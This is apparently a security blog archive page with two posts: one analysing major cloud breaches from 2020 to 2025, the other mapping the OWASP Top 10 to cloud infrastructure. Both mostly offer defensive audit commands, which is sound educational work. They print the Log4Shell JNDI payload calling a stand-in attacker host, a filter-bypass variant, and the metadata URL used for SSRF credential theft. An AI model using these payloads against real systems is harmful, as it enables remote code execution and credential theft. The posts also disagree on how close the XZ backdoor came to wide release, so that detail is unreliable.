Cloud Security Archives - Page 2 of 3

Cloud Security Breaches 2020–2025: What Actually Got Exploited

May 27, 2026 by Vamshi Krishna Santhapuri

Reading Time: 11 minutes

What is purple team security → OWASP Top 10 mapped to cloud infrastructure → Cloud security breaches 2020–2025

TL;DR

Cloud security breaches from 2020 to 2025 cluster into three root causes: identity compromise, supply chain compromise, and misconfiguration — every major incident falls into at least one
SolarWinds (Dec 2020): build pipeline compromise — attacker signed malware with a legitimate cert (A08)
Log4Shell (Dec 2021): injection in a logging library present in millions of Java apps (A03)
Uber (Sep 2022): MFA fatigue against a contractor → hardcoded admin creds on internal share (A07 + A02)
CircleCI (Jan 2023): session token stolen from an engineer’s laptop → CI/CD secrets exfiltrated (A07 + A08)
Okta (Oct 2023): support system access via stolen credentials → customer tenant data exposed (A07)
XZ Utils (Apr 2024): 2-year social engineering campaign → backdoor in release tarball (A08 + A06)
The attack surface does not change — only the specific vector within each category

OWASP Mapping: This episode is cross-category — A01 through A10 all appear. Each breach is annotated with its primary OWASP mapping.

The Big Picture

┌────────────────────────────────────────────────────────────────────┐
│           2020–2025 BREACH TIMELINE                                │
│                                                                    │
│  Dec 2020    Dec 2021    Sep 2022    Jan 2023    Oct 2023  Apr 2024 │
│     │            │           │           │           │        │    │
│     ▼            ▼           ▼           ▼           ▼        ▼    │
│  Solar-      Log4Shell     Uber       CircleCI     Okta    XZ Utils│
│  Winds                                                             │
│                                                                    │
│  ══════════════════════════════════════════════════════════        │
│                                                                    │
│  Root Cause Categories (3 total):                                  │
│                                                                    │
│  SUPPLY CHAIN          IDENTITY               MISCONFIGURATION     │
│  SolarWinds            Uber                   Capital One (2019)   │
│  XZ Utils              Okta                   CircleCI (partial)   │
│  Log4Shell (partial)   CircleCI (initial)                          │
│                                                                    │
│  OWASP Primaries:                                                  │
│  A08 → A07 → A07 → A07/A08 → A07 → A08/A06                       │
│                                                                    │
└────────────────────────────────────────────────────────────────────┘

The cloud security breaches from 2020 to 2025 reveal a consistent pattern: attackers are not finding new classes of vulnerability. They are exploiting the same three root causes — identity, supply chain, misconfiguration — in different combinations against different technology stacks.

Why These Breaches Are the Curriculum

Every episode in this series from EP04 onward takes a specific attack path from these incidents and walks through the simulation, detection, and fix. You cannot understand the fix without understanding the breach mechanics. And you cannot understand why your detection didn’t fire without knowing what the attacker actually did.

This episode is the reference. When EP05 covers MFA fatigue, it builds on the Uber anatomy here. When EP09 covers XZ Utils, the supply chain mechanics here are the foundation.

December 2020: SolarWinds — Supply Chain at Scale

OWASP: A08 (Software and Data Integrity Failures)

SolarWinds is the incident that defined supply chain attacks for the decade. The attacker — attributed to Russia’s SVR — compromised the build environment for SolarWinds Orion IT monitoring software in early 2020. They inserted a backdoor called SUNBURST into the software build pipeline.

The mechanics:

Normal build pipeline:
  Source code → Build system → Sign with SolarWinds cert → Distribute → Customer installs

Compromised pipeline (SolarWinds):
  Source code → Build system → [SUNBURST injected here] → Sign with SolarWinds cert → Distribute → 18,000 customers install

SUNBURST was signed with SolarWinds’ legitimate Authenticode certificate. It passed signature verification. It was distributed through the normal software update mechanism. Customers with automatic updates installed it because the update was signed by a trusted vendor.

The backdoor remained dormant for 12–14 days after installation before activating. It used DGA (domain generation algorithm) to contact C2 infrastructure, disguising traffic as Orion telemetry. After the initial beaconing period, the attacker manually selected targets from the 18,000 infected environments.

Confirmed affected organizations: US Treasury, US Commerce Department, FireEye, Microsoft, Intel, Deloitte.

What a detection would have looked like:
– Unexpected outbound DNS queries to avsvmcloud.com subdomains
– Orion software making network connections outside its normal profile
– New scheduled tasks or service modifications by the Orion process

The structural failure: The build system was not isolated, not monitored for unexpected behavior, and the build process itself was not reproducible from source. A reproducible build would have made the SUNBURST injection detectable — the build output would not match the source.

December 2021: Log4Shell — Injection in a Logging Library

OWASP: A03 (Injection), A06 (Vulnerable and Outdated Components)

Log4Shell (CVE-2021-44228) is the closest thing to a universal vulnerability that existed in the 2020s. Log4j 2.x was embedded in thousands of Java applications — not as a direct dependency but as a transitive dependency, often several layers deep in the dependency tree. Developers frequently didn’t know they were running it.

The vulnerability: Log4j evaluated JNDI (Java Naming and Directory Interface) lookups embedded in logged strings. Any input that ended up in a log message could trigger a JNDI lookup:

${jndi:ldap://attacker.com/exploit}

# Log4j evaluates the expression, makes LDAP request to attacker.com
# Attacker's LDAP server responds with a Java class
# Log4j loads and executes the class
# Result: remote code execution

The attack was trivial to launch and extremely difficult to fully enumerate exposure for — because Log4j was present as a transitive dependency in components that teams didn’t know they owned.

What made it particularly bad for cloud infrastructure:
– Lambda functions, ECS containers, EKS workloads, and Elastic Beanstalk apps all potentially affected
– WAFs were initially bypassed with encoding variants (${${lower:j}ndi:...})
– The vulnerable class wasn’t in the primary JAR — it was in log4j-core, which appeared as an indirect dependency

# Find Java applications that might include log4j (rough scan — requires access to filesystems)
find / -name "log4j*.jar" -o -name "log4j-core*.jar" 2>/dev/null

# In a Kubernetes context — check running container images for log4j
kubectl get pods -A -o json | \
  jq -r '.items[].spec.containers[].image' | \
  sort -u
# Then scan each image: trivy image --severity CRITICAL <image>

The fix was patching — upgrading Log4j to 2.17.0+. The mitigation was log4j2.formatMsgNoLookups=true or removing the JndiLookup class from the classpath. Neither mitigation addressed the root cause of having an outdated component with critical CVE.

September 2022: Uber — MFA Fatigue Meets Hardcoded Credentials

OWASP: A07 (Identification and Authentication Failures), A02 (Cryptographic Failures)

The Uber breach is a clean illustration of attack chaining: one authentication failure enables discovery of a second authentication failure.

Minute-by-minute anatomy:

Attacker purchases Uber contractor credentials on a criminal marketplace (or phishes them directly)
Contractor has MFA enrolled — Duo push notifications
Attacker initiates login repeatedly, triggering Duo push notifications to contractor’s phone
Contractor rejects 3–4 push notifications
Attacker sends WhatsApp message to contractor’s phone: “Hi, this is IT support. We’re having an issue with your account. Please accept the next Duo notification.”
Contractor accepts
Attacker is in

From inside the Uber network, the attacker found a network share accessible to contractors. On that share: a PowerShell script. In that script: hardcoded admin credentials for Thycotic, Uber’s privileged access management (PAM) system.

With Thycotic admin access, the attacker retrieved credentials for: AWS, GCP, GSuite, VMware, Slack, HackerOne. Full internal access.

The two failures:
– A07: Push-notification MFA that can be defeated by social engineering + fatigue
– A02: Admin credentials in a plaintext PowerShell script on a network share

# Detect MFA fatigue attempts in Okta logs (if Okta is the IdP)
# Query: multiple MFA push rejections followed by acceptance within short window
# In Okta System Log API:
curl -H "Authorization: SSWS ${OKTA_API_TOKEN}" \
  "https://your-org.okta.com/api/v1/logs?filter=eventType+eq+\"user.authentication.auth_via_mfa\"&since=2024-01-01T00:00:00Z" | \
  jq '[.[] | select(.outcome.result == "FAILURE")] | group_by(.actor.id) | map({user: .[0].actor.displayName, failures: length}) | sort_by(.failures) | reverse | .[0:10]'

The structural fix for MFA fatigue is not user training. It is replacing push-notification MFA with phishing-resistant MFA: FIDO2 hardware keys (YubiKey) or passkeys. A hardware key requires physical presence — a WhatsApp message cannot convince a hardware key to authenticate.

January 2023: CircleCI — Session Token Theft and Secret Exfiltration

OWASP: A07 (Authentication Failures), A08 (Software and Data Integrity Failures)

CircleCI disclosed in January 2023 that an attacker had accessed customer data — specifically, environment variables, tokens, and keys stored by customers in CircleCI’s secret storage.

The attack chain:

Malware on a CircleCI engineer’s laptop stole a 2FA-backed SSO session token
The session token was valid and not yet expired — no MFA re-challenge for the session
Attacker used the session token to access CircleCI’s internal systems
From internal systems, attacker accessed the production database containing encrypted customer secrets
The encryption keys were also accessible — attacker obtained both

The attack did not break encryption. It circumvented encryption by accessing the keys through internal systems that the compromised session token could reach.

What customers stored in CircleCI that was exposed:
– AWS IAM access keys and secret keys
– GitHub tokens
– DockerHub credentials
– SSH private keys
– API tokens for third-party services

The scale: CircleCI could not enumerate which customer secrets were accessed — they notified all customers with environment variables stored in the system.

# After a CI/CD platform breach: rotate all credentials that were stored there
# Start with AWS credentials — find and disable exposed access keys

# List all IAM access keys
aws iam list-users --query 'Users[].UserName' --output text | \
  tr '\t' '\n' | \
  while read user; do
    aws iam list-access-keys --user-name "$user" \
      --query "AccessKeyMetadata[].{User:'$user',Key:AccessKeyId,Status:Status,Created:CreateDate}" \
      --output table
  done

# Disable a specific access key
aws iam update-access-key \
  --access-key-id AKIAIOSFODNN7EXAMPLE \
  --status Inactive \
  --user-name affected-user

The structural lesson: Secrets stored in a CI/CD platform are only as secure as that platform’s internal access controls and the endpoint security of the engineers who access it. The alternative — short-lived credentials via OIDC workload identity — means no long-lived secrets exist to exfiltrate.

October 2023: Okta — Support System Compromise

OWASP: A07 (Identification and Authentication Failures)

Okta is the identity provider for thousands of organizations. An attacker who compromises Okta’s support system gains access to customer identity configurations.

In October 2023, Okta disclosed that an attacker had accessed their customer support case management system using stolen credentials. The attacker used that access to view HTTP Archive (HAR) files that customers had uploaded as part of support tickets. HAR files capture all network traffic in a browser session — including session cookies and authentication tokens.

What the attacker retrieved from HAR files:
– Active session tokens for customer Okta admin accounts
– Enough data to authenticate as Okta admins for affected customers

Confirmed affected customers (that disclosed publicly):
– 1Password (detected and contained quickly)
– Cloudflare
– BeyondTrust

The dwell time: Okta’s later forensic analysis revealed the attacker had access for two weeks before the disclosure.

# Check Okta System Log for suspicious admin activity
# Look for admin authentications from unusual IPs or at unusual times
curl -H "Authorization: SSWS ${OKTA_API_TOKEN}" \
  "https://your-org.okta.com/api/v1/logs?filter=eventType+eq+\"user.session.start\"+and+actor.type+eq+\"User\"&since=$(date -d '30 days ago' --iso-8601=seconds)" | \
  jq '.[] | {user: .actor.displayName, ip: .client.ipAddress, time: .published, result: .outcome.result}'

The structural implication for organizations using Okta: Tier-0 accounts (Okta administrators) need break-glass procedures and hardware key MFA — not because Okta itself will be compromised, but because a support system compromise at a SaaS provider can expose session context that reaches those accounts.

OWASP: A08 (Software and Data Integrity Failures), A06 (Vulnerable and Outdated Components)

XZ Utils (CVE-2024-3094) is the most sophisticated supply chain attack to date in the open-source ecosystem. The attacker operated under the pseudonym “Jia Tan” and spent approximately two years building trust in the XZ Utils project before inserting a backdoor.

The timeline:

2022 Q4 — Jia Tan begins contributing to XZ Utils with legitimate, high-quality patches
2023 Q1 — Jia Tan increases contribution frequency; original maintainer shows signs of burnout
2023 Q2 — Jia Tan gains commit access to XZ Utils
2024 Q1 — Jia Tan releases XZ Utils 5.6.0 and 5.6.1 with backdoor in release tarball
          (NOT in git repository — only in the distributed tarball)
2024 Q2 — Andres Freund (Microsoft engineer, incidentally) notices SSH is 500ms slower
          on systems with xz 5.6.x; investigates; finds backdoor
          Reported April 1, 2024; CVE assigned April 2, 2024

The backdoor’s target: The backdoor patched sshd via systemd on glibc-based Linux systems. On affected systems, it would have given the attacker remote code execution on SSH servers — specifically, authentication bypass for a specific RSA key pair held by the attacker.

What was 1–2 weeks from shipping broadly:
– Fedora 40 (test release only — caught before stable)
– Debian unstable/testing
– openSUSE Tumbleweed

The detection insight: The backdoor was in the release tarball, not the git repository. git clone and git diff would not have shown it. The only detection was comparing the distributed tarball’s build output against a reproducible build from source — or noticing the anomalous SSH latency.

# Check if your systems have the affected xz version
xz --version
# Vulnerable: 5.6.0 or 5.6.1

# Check on RPM-based systems
rpm -q xz

# Check on Debian/Ubuntu systems
dpkg -l xz-utils

# Check for sshd linked against compromised libzma
ldd $(which sshd) | grep liblzma
# If libzma is present and xz is 5.6.0 or 5.6.1, the system was exposed

The Three Root Causes: A Framework for Your Exercise Backlog

After analyzing these six incidents (and the broader 2020–2025 breach landscape), three root causes account for virtually every major cloud infrastructure compromise:

┌─────────────────────────────────────────────────────────────────┐
│                                                                 │
│  ROOT CAUSE 1: IDENTITY                                         │
│  Attacker obtains valid credentials — stolen, phished,          │
│  or socially engineered. MFA does not stop it if MFA            │
│  itself can be bypassed (fatigue, SIM swap, token theft).       │
│  Incidents: Uber, Okta, CircleCI (initial vector)               │
│                                                                 │
│  ROOT CAUSE 2: SUPPLY CHAIN                                     │
│  Attacker compromises something you trust: a vendor's           │
│  software, a build pipeline, an open-source dependency.         │
│  The artifact you install is legitimate — and malicious.        │
│  Incidents: SolarWinds, XZ Utils, Log4Shell (component)         │
│                                                                 │
│  ROOT CAUSE 3: MISCONFIGURATION                                  │
│  An access control is wrong. A resource is exposed that         │
│  shouldn't be. An encryption requirement is missing.            │
│  No attacker capability required — just knowledge of the gap.   │
│  Incidents: Capital One (S3 + IAM), public buckets broadly      │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘

Your purple team exercise backlog should cover all three. The remaining episodes in this series address each one:

Identity: EP05 (MFA fatigue), EP10 (cross-account lateral movement)
Supply chain: EP06 (CI/CD secrets), EP09 (SolarWinds to XZ Utils)
Misconfiguration: EP04 (broken access control in AWS), EP07 (SSRF/IMDS), EP08 (container escape)

Run This in Your Own Environment: Breach Scenario Self-Assessment

Before starting the technique-specific episodes, run this self-assessment to identify which breach scenario your environment is most exposed to:

#!/bin/bash
# Purple Team EP03 — Breach Exposure Self-Assessment

echo "=== IDENTITY EXPOSURE ==="
echo "--- Users with console access and no MFA ---"
aws iam generate-credential-report > /dev/null 2>&1 && sleep 3
aws iam get-credential-report --query 'Content' --output text | \
  base64 -d | awk -F',' 'NR>1 && $4=="true" && $8=="false" {print "  NO MFA: " $1}'

echo ""
echo "=== SUPPLY CHAIN EXPOSURE ==="
echo "--- Lambda functions with old runtimes (EOL = higher CVE exposure) ---"
aws lambda list-functions \
  --query 'Functions[?Runtime==`python3.8` || Runtime==`nodejs14.x` || Runtime==`java8`].{Name:FunctionName,Runtime:Runtime}' \
  --output table

echo ""
echo "=== MISCONFIGURATION EXPOSURE ==="
echo "--- S3 buckets without account-level public access block ---"
ACCOUNT=$(aws sts get-caller-identity --query Account --output text)
PAB=$(aws s3control get-public-access-block --account-id "$ACCOUNT" 2>/dev/null)
if [ -z "$PAB" ]; then
  echo "  CRITICAL: Account-level S3 public access block is NOT set"
else
  echo "$PAB" | jq '{BlockPublicAcls, IgnorePublicAcls, BlockPublicPolicy, RestrictPublicBuckets}'
fi

echo ""
echo "--- EC2 instances with IMDSv1 enabled (SSRF risk) ---"
aws ec2 describe-instances \
  --query 'Reservations[].Instances[?MetadataOptions.HttpTokens!=`required`].{ID:InstanceId,State:State.Name}' \
  --output table

⚠ Common Mistakes When Using Breach History as a Training Resource

Assuming “we’re not SolarWinds” means supply chain doesn’t apply. You don’t have to be a software vendor. Your GitHub Actions workflows pull third-party actions. Your Dockerfiles pull base images. Your Lambda functions install pip packages. Every external artifact is a supply chain dependency.

Treating Log4Shell as “old news.” The vulnerability was disclosed in 2021. Organizations are still finding Log4j in unexpected places in 2024 — embedded in monitoring agents, database drivers, and vendor-supplied applications where the dependency tree was never audited.

Responding to Uber/Okta by mandating security awareness training. The Uber breach happened to an experienced contractor who made one decision under social pressure. The structural fix is hardware MFA that cannot be fatigue-attacked — not a training module that adds friction and gets clicked through.

Not correlating your own logs against breach indicators. Every breach in this episode produced specific, searchable indicators: specific CloudTrail event patterns, specific process behaviors, specific network anomalies. If you have historical logs, you can run indicators of compromise against them to see whether your environment would have surfaced those indicators.

Quick Reference

Breach	Year	OWASP Primary	Root Cause	Structural Fix
SolarWinds	2020	A08	Supply chain — build pipeline compromise	Reproducible builds, build system isolation
Log4Shell	2021	A03, A06	Injection + vulnerable component	Patch + dependency inventory
Uber	2022	A07, A02	Identity — MFA fatigue + hardcoded creds	Hardware MFA + no hardcoded secrets
CircleCI	2023	A07, A08	Identity — session token theft → CI secret theft	OIDC short-lived creds instead of stored secrets
Okta	2023	A07	Identity — support system compromise → token theft	Hardware MFA for tier-0, session token rotation
XZ Utils	2024	A08, A06	Supply chain — social engineering → maintainer trust	Reproducible builds, artifact signing, SLSA

Key Takeaways

Cloud security breaches from 2020 to 2025 cluster into three root causes: identity compromise, supply chain compromise, and misconfiguration — every major incident is one or more of these
SolarWinds and XZ Utils are the same attack class: compromise the build pipeline and sign the result with a trusted key
Uber demonstrates that MFA does not prevent breach when the MFA mechanism is push-notification — fatigue + social engineering defeats it
CircleCI demonstrates that long-lived secrets stored in a CI/CD platform are only as secure as that platform — OIDC short-lived credentials eliminate the exposure
Log4Shell demonstrates that vulnerable transitive dependencies are invisible without active dependency scanning — “we didn’t use Log4j” was wrong for thousands of organizations
The attack surface does not change: the same three root causes that caused SolarWinds in 2020 caused XZ Utils in 2024
Your purple team exercise backlog should include at least one scenario for each of the three root causes

What’s Next

EP04 starts the technique-specific episodes with broken access control in AWS — the most common OWASP A01 manifestation in cloud infrastructure. The exercise scenario: an S3 bucket with 47 million records, public for six months, with no alert ever firing. We simulate it, detect it, and fix the IAM and S3 configuration so it cannot happen in your account. If you want the full context for AWS IAM privilege escalation paths that broken access control enables, the IAM series EP08 covers that attack chain in detail.

Get EP04 in your inbox when it publishes → subscribe at linuxcent.com

OWASP Top 10 Mapped to Cloud Infrastructure: Beyond Web Apps

May 19, 2026 by Vamshi Krishna Santhapuri

Reading Time: 11 minutes

What is purple team security → OWASP Top 10 mapped to cloud infrastructure → EP03: Cloud security breaches 2020–2025

TL;DR

OWASP Top 10 cloud infrastructure mapping shows that every category has a direct cloud-native equivalent — this is not a web-app-only taxonomy
A01 Broken Access Control = IAM wildcards, public S3, overly permissive trust policies
A07 Authentication Failures = MFA fatigue, session token theft, push-notification abuse
A08 Software/Data Integrity = compromised build pipelines, unsigned container images, secrets in CI/CD
A10 SSRF = EC2 metadata endpoint abuse, IMDSv1 credential theft (the Capital One attack vector)
Every major cloud breach 2020–2025 lands in one of these ten categories — the taxonomy was always infrastructure-applicable

OWASP Mapping: All categories — A01 through A10. This episode is the reference map for the entire series.

The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│           OWASP TOP 10 → CLOUD INFRASTRUCTURE MAPPING              │
│                                                                     │
│  OWASP (2021)              CLOUD EQUIVALENT          REAL BREACH    │
│  ─────────────────────────────────────────────────────────────────  │
│  A01 Broken Access Ctrl  → IAM wildcards, public S3  Capital One    │
│  A02 Cryptographic Fail  → Plaintext secrets, weak   CircleCI       │
│                            KMS config                               │
│  A03 Injection           → Log4j JNDI, SSRF as       Log4Shell      │
│                            injection variant                        │
│  A04 Insecure Design     → --privileged containers   runc CVEs      │
│                            no seccomp/AppArmor                      │
│  A05 Security Misconfig  → K8s RBAC defaults, open   Multiple       │
│                            etcd ports                               │
│  A06 Vulnerable Comps    → Transitive deps, outdated  XZ Utils      │
│                            base images                              │
│  A07 Auth Failures       → MFA fatigue, stolen        Uber, Okta    │
│                            session tokens                           │
│  A08 SW/Data Integrity   → Unsigned artifacts,        SolarWinds    │
│                            compromised pipelines                    │
│  A09 Logging/Monitoring  → Missing CloudTrail,        Most          │
│                            no workload telemetry                    │
│  A10 SSRF                → EC2 IMDS abuse, metadata  Capital One    │
│                            credential theft                         │
└─────────────────────────────────────────────────────────────────────┘

OWASP Top 10 cloud infrastructure mapping is not a translation exercise — it is a recognition that the same classes of failure that compromise web applications also compromise cloud infrastructure, Kubernetes clusters, and CI/CD pipelines. The language shifts; the attack classes don’t.

Why Engineers Treat OWASP as a Web-App-Only Concern

I kept hearing OWASP Top 10 in web application security reviews. The AppSec team ran it through their checklist. The infrastructure team shrugged — “that’s for the developers.” Then I looked at the actual cloud breaches: Capital One, Uber, CircleCI, SolarWinds. Every one of them mapped to an OWASP category.

The confusion comes from OWASP’s origins. The project started in 2001 focused on web application vulnerabilities. SQL injection, XSS, broken authentication against HTTP endpoints. The cloud and container ecosystem didn’t exist. So the examples stayed web-application-centric even as the underlying failure classes proved universal.

The 2021 OWASP Top 10 update is more abstracted than its predecessors — intentionally. “Broken Access Control” doesn’t say “SQL injection.” It says access control. That applies to every IAM policy that has "Action": "*" where it shouldn’t.

This episode makes the mapping explicit. One OWASP category at a time.

A01: Broken Access Control — IAM Wildcards and Public S3

Web equivalent: A user can access other users’ records by modifying the URL parameter.

Cloud equivalent: An IAM role with "Action": "*" on "Resource": "*". An S3 bucket with public read. A cross-account trust policy that allows any principal in the account, not just a specific role.

Broken access control in cloud infrastructure means the principal can reach a resource it should not be able to reach, because the access control decision was not made or was made incorrectly.

The Capital One breach (2019, disclosed publicly) is the canonical example. A WAF running on EC2 had an IAM role attached. That role had permissions to list and retrieve objects from S3 buckets. SSRF against the WAF reached the EC2 metadata endpoint and retrieved the IAM role credentials. Those credentials then accessed 100 million customer records. The SSRF was A10. The fact that the WAF had access to customer data S3 buckets was A01.

aws s3control get-public-access-block --account-id $(aws sts get-caller-identity --query Account --output text)

# Find buckets that override the account-level block
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    result=$(aws s3api get-public-access-block --bucket "$bucket" 2>/dev/null)
    if echo "$result" | grep -q '"BlockPublicAcls": false'; then
      echo "PUBLIC ACCESS NOT BLOCKED: $bucket"
    fi
  done

A02: Cryptographic Failures — Plaintext Secrets and Weak KMS Config

Web equivalent: Passwords stored as MD5 hashes. Credit card numbers in plaintext in the database.

Cloud equivalent: DATABASE_URL=postgres://user:password@host/db in a .env file committed to a public repository. An S3 bucket with sensitive data where server-side encryption is not enforced. KMS key policies that allow kms:Decrypt to any principal in the account.

Cryptographic failures in the cloud are less about broken algorithms and more about secrets that aren’t secret. The CircleCI breach (January 2023) exposed customer secrets — API tokens, AWS credentials, private keys — that customers had stored in CircleCI’s environment variables. The attacker compromised CircleCI’s infrastructure and exfiltrated those secrets. The cryptographic failure was that secrets were stored in a way that could be exfiltrated when the platform was compromised, rather than being bound to hardware or using short-lived credentials that couldn’t be replayed.

# Check if default EBS encryption is enabled (prevents data at rest failures)
aws ec2 get-ebs-encryption-by-default --region us-east-1

# Check for S3 buckets without default encryption
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    enc=$(aws s3api get-bucket-encryption --bucket "$bucket" 2>/dev/null)
    if [ -z "$enc" ]; then
      echo "NO DEFAULT ENCRYPTION: $bucket"
    fi
  done

A03: Injection — Log4Shell and SSRF as Injection Variants

Web equivalent: SQL injection via unsanitized query parameters.

Cloud equivalent: Log4Shell (CVE-2021-44228) used JNDI lookup injection via HTTP headers to execute arbitrary code in Java applications. SSRF (Server-Side Request Forgery) is an injection variant where attacker-controlled input causes the server to make requests to internal endpoints — including http://169.254.169.254/latest/meta-data/.

Log4Shell (December 2021) demonstrated injection against infrastructure directly. The User-Agent or X-Forwarded-For header contained ${jndi:ldap://attacker.com/exploit}. The logging framework evaluated it. The outcome was remote code execution on any Java application using Log4j 2.x.

The fix was not “validate user input better.” The fix was patching Log4j and — for SSRF — enforcing IMDSv2 (which requires a PUT request with a session token that a naive SSRF cannot produce).

# Check if all EC2 instances require IMDSv2 (prevents SSRF-to-metadata attacks)
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{ID:InstanceId,IMDSv2:MetadataOptions.HttpTokens}' \
  --output table
# Desired: HttpTokens = "required" for all instances

A04: Insecure Design — Privileged Containers and Missing Runtime Controls

Web equivalent: Application architecture where any authenticated user can reach administrative functions without additional authorization checks.

Cloud equivalent: A container deployed with --privileged: true or allowPrivilegeEscalation: true. A Kubernetes pod without securityContext restricting capabilities. A cluster with no admission controller enforcing pod security standards.

Insecure design in the container context means the security controls that should prevent container breakout were never there. They weren’t removed — they were never designed in. The kernel doesn’t enforce namespace isolation when a container has CAP_SYS_ADMIN. The attacker doesn’t exploit a vulnerability — they use capabilities the design granted.

# Find pods running as root or with privileged flag
kubectl get pods -A -o json | \
  jq -r '.items[] | 
    select(
      (.spec.containers[].securityContext.privileged == true) or
      (.spec.securityContext.runAsNonRoot != true)
    ) | 
    "\(.metadata.namespace)/\(.metadata.name)"'

A05: Security Misconfiguration — Default Kubernetes RBAC and Open Ports

Web equivalent: Default admin credentials not changed. Directory listing enabled on the web server.

Cloud equivalent: kubectl access with cluster-admin ClusterRoleBinding for the default service account. etcd port 2379 accessible from the pod network. AWS security groups with 0.0.0.0/0 on port 22.

Security misconfiguration in Kubernetes is particularly common because the defaults in older Kubernetes versions were not secure-by-default. The default service account in each namespace mounts a service account token that can authenticate to the API server. In clusters without RBAC properly configured, that token can enumerate and modify resources.

# Check what the default service account can do in a namespace
kubectl auth can-i --list --as=system:serviceaccount:default:default -n default

# Find ClusterRoleBindings that bind cluster-admin to non-system subjects
kubectl get clusterrolebindings -o json | \
  jq '.items[] | 
    select(.roleRef.name == "cluster-admin") | 
    {name: .metadata.name, subjects: .subjects}'

A06: Vulnerable and Outdated Components — Transitive Dependencies and Base Images

Web equivalent: An npm package in the dependency tree has a known CVE. The application ships with an outdated version of OpenSSL.

Cloud equivalent: A container base image built from ubuntu:20.04 six months ago, now carrying 47 critical CVEs in installed packages. A Lambda function with a vendored boto3 version that has a known vulnerability. XZ Utils (CVE-2024-3094) — a backdoor inserted into the release tarball of a compression library present in almost every major Linux distribution.

XZ Utils is the defining example of this category in the infrastructure context. The attack was supply chain: two years of social engineering against a maintainer, gaining commit access, inserting a backdoor in the release tarball rather than the source repository (so source audits wouldn’t catch it). The XZ backdoor targeted SSH servers on systems using systemd — it would have given the attacker remote code execution on SSH servers across Fedora, Debian, and Ubuntu before it was caught five weeks before broad distribution release.

# Scan a container image for known CVEs (requires trivy)
trivy image --severity HIGH,CRITICAL your-registry/your-image:tag

# Check Lambda function runtime versions against AWS's deprecation schedule
aws lambda list-functions \
  --query 'Functions[].{Name:FunctionName,Runtime:Runtime,LastModified:LastModified}' \
  --output table

A07: Identification and Authentication Failures — MFA Fatigue and Stolen Tokens

Web equivalent: Session tokens that don’t expire. Password reset links that work indefinitely.

Cloud equivalent: Push-notification MFA that can be exhausted by fatigue attacks. AWS console sessions with 12-hour validity. OAuth tokens stored in browser local storage. SAML assertions that can be replayed.

The Uber breach (September 2022) is the canonical cloud/SaaS example. A contractor’s credentials were obtained via social engineering. The attacker sent repeated Duo push notifications — the contractor rejected them. The attacker then sent a WhatsApp message claiming to be IT support and asking the contractor to accept the next notification. They did. From there, the attacker found a network share containing a PowerShell script with hardcoded admin credentials for Uber’s Thycotic PAM system — full access to the Uber internal network.

The authentication failure was two-layered: push MFA that could be fatigue-attacked, and credentials stored in plaintext in an accessible location.

# List IAM users with console access but no MFA enrolled
aws iam get-account-summary | jq '{AccountMFAEnabled: .SummaryMap.AccountMFAEnabled}'

# Find specific users without MFA
aws iam list-users --query 'Users[].UserName' --output text | \
  tr '\t' '\n' | \
  while read user; do
    mfa=$(aws iam list-mfa-devices --user-name "$user" --query 'MFADevices' --output text)
    if [ -z "$mfa" ]; then
      echo "NO MFA: $user"
    fi
  done

A08: Software and Data Integrity Failures — Compromised Build Pipelines

Web equivalent: Pulling npm packages without verifying checksums. Deploying a build without artifact signing.

Cloud equivalent: A CI/CD pipeline that pulls dependencies from an unauthenticated source. A container image built from a Dockerfile that pulls the latest version of a base image without pinning the digest. A GitHub Actions workflow that references a third-party action at a mutable tag rather than a commit SHA.

SolarWinds (December 2020) is the infrastructure-scale example. The attacker compromised SolarWinds’ build system. The malicious code (SUNBURST) was inserted into the Orion software build process, signed with SolarWinds’ legitimate code signing certificate, and distributed to approximately 18,000 customers via the normal software update mechanism. The artifact was signed. The signature verified. The code was malicious.

The software integrity failure was that the build pipeline itself was not monitored or hardened — an attacker who controlled the build environment could produce signed, trusted artifacts.

# Check GitHub Actions workflows for mutable action references (uses @main or @v1 instead of SHA)
grep -r "uses:" .github/workflows/ | grep -v "@[a-f0-9]\{40\}"

# Verify a container image digest before deployment
docker pull your-registry/your-image:tag
docker inspect your-registry/your-image:tag --format='{{.Id}}'
# Compare this digest to the pinned value in your deployment manifest

A09: Security Logging and Monitoring Failures — What You Can’t See, You Can’t Stop

Web equivalent: No access logs on the web server. No alerting on repeated failed login attempts.

Cloud equivalent: CloudTrail not enabled in all regions. VPC Flow Logs disabled. No GuardDuty. Container workloads with no runtime security monitoring. Lambda functions that log errors to /dev/null.

This is the category that causes the 11-day detection time from EP01. The attacker’s techniques generated events. The events were not collected, or collected but not alerting, or alerting but not investigated.

# Verify CloudTrail is logging in all regions
aws cloudtrail describe-trails --include-shadow-trails true \
  --query 'trailList[?IsMultiRegionTrail==`true`].{Name:Name,Bucket:S3BucketName,Logging:HasCustomEventSelectors}'

# Check which regions have GuardDuty disabled
for region in $(aws ec2 describe-regions --query 'Regions[].RegionName' --output text); do
  status=$(aws guardduty list-detectors --region "$region" --query 'DetectorIds' --output text 2>/dev/null)
  if [ -z "$status" ]; then
    echo "GUARDDUTY DISABLED: $region"
  fi
done

A10: Server-Side Request Forgery (SSRF) — EC2 Metadata and IMDSv1

Web equivalent: An application fetches a URL provided by the user. The user provides http://internal-service/admin.

Cloud equivalent: An application fetches a URL provided by the user (or constructed from user input). The user provides http://169.254.169.254/latest/meta-data/iam/security-credentials/. The response contains temporary IAM credentials valid for the attached instance role.

This is how the Capital One breach worked. A WAF instance had a SSRF vulnerability. The attacker exploited it to reach the EC2 Instance Metadata Service (IMDS). IMDSv1 has no authentication — any HTTP GET to the metadata endpoint from inside the instance returns credentials. Those credentials had overly permissive S3 access (A01). The result was 100 million records exfiltrated.

IMDSv2 requires a PUT request to get a session token before credentials can be retrieved — a SSRF via GET cannot retrieve IMDSv2 credentials. Enforcing IMDSv2 closes the SSRF-to-credentials path.

# Check all EC2 instances for IMDSv1 (HttpTokens != "required" means vulnerable)
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{
    ID:InstanceId,
    Name:Tags[?Key==`Name`]|[0].Value,
    IMDSv2:MetadataOptions.HttpTokens,
    State:State.Name
  }' \
  --output table

# Enforce IMDSv2 on a specific instance
aws ec2 modify-instance-metadata-options \
  --instance-id i-0123456789abcdef0 \
  --http-tokens required \
  --http-endpoint enabled

The Series Attack Map: Which Episodes Cover Which Categories

OWASP	Category	Purple Team Episode
